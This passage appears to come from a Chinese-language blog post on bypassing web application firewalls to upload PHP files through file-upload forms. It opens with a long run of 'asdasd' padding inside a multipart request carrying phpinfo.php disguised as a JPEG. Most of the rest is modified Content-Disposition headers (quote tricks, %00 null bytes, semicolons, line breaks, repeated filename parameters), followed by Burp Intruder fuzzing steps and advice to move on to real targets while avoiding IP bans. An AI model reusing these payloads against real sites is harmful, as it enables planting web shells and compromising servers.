asdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasvasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdadasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdassdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasd;name="upload_file"; filename="phpinfo.php"
Content-Type: image/jpeg

<?php phpinfo(); ?> 
-----------------------------3440298842996763469523404607
Content-Disposition: form-data; name="submit"

上传
-----------------------------3440298842996763469523404607--

成功了可以上传上去

image-20220515181446281

符号变异

'号,测试了这个好像不行

原理就是waf检查的时候可能检查单引号和双引号的内容,你用一个单引号他就没有办法检查了

1
2
3
4
5
6
7
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename='xxx.php
Content-Type: image/jpeg

"号,测试了这个好像不行

原理就是waf检查的时候可能检查单引号和双引号的内容,如果你用的是一个双引号他检查就可以检查不到

1
2
3
4
5
6
7
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename="xxx.php
Content-Type: image/jpeg

引号其他测试方法,也可上传,但是无法解析

1
2
3
4
5
6
7
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename="x"xxx.php"
Content-Type: image/jpeg

%00,这个方法可以

1
2
3
4
5
6
7
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename="xxx.php%00.png"
Content-Type: image/jpeg

要在16进制里面修改

image-20220515183652445

;号,测试了这个好像不行,其他文章我看见人家测试成功了 文章地址https://www.yuque.com/samxara/swro13/ee9r0h

1
2
3
4
5
6
7
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename="xxx.png;aa.php"
Content-Type: image/jpeg

换行

我这个测试没有成功,其他文章测试成功了 文章地址https://www.yuque.com/samxara/swro13/ee9r0h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename="xxx.p
hp"
Content-Type: image/jpeg

或者修改后
Content-Disposition: form-data; name="upload_file"; filename="xxx.
p
h
p"
Content-Type: image/jpeg

或者修改后
Content-Disposition: form-data; name="upload_file"; filename="xxx
.
p
h
p"
Content-Type: image/jpeg

参数多次

下面这个方法我没有测试成功,其他文章测试成功了 文章地址https://www.yuque.com/samxara/swro13/ee9r0h

1
2
3
4
5
6
7
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.png"; filename="xxx.php"
Content-Type: image/png

下面还有几种方法,能上传但是不能解析

1
2
3
4
5
6
7
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data;name="upload_file"; filename="Content-Disposition: form-data;name="upload_file"a.php"
Content-Type: image/jpeg

image-20220515184849891

配合目录命名绕过

“/“与”;”配合绕过,我测试好像不行

1
2
3
4
5
6
7
8
9
10
11
12
修改前
Content-Disposition: form-data; name="upload_file"; filename="xxx.php"
Content-Type: image/jpeg

修改后
Content-Disposition: form-data; name="upload_file"; filename="/jpeg;x.php"
Content-Type: image/jpeg

或者修改后

Content-Disposition: form-data; name="upload_file"; filename="/jpeg;/x.php"
Content-Type: image/jpeg

FUZZ字典配合

手工测试的话有点麻烦,可以借助写好的字典配合BP进行批量测试,先在本地测试,然后在真实环境进行测试,以防封IP

字典项目地址

1
2
https://github.com/TheKingOfDuck/fuzzDicts
https://github.com/fuzzdb-project/fuzzdb

借助fuzzDicts的php字典进行测试。

首先将拦截的数据包发送至Intruder

img

清除所有变量

img

将filename的值设置为变量

img

payload加载字典

img

开始攻击

img

不一定能成功,成败与否的关键是字典的好坏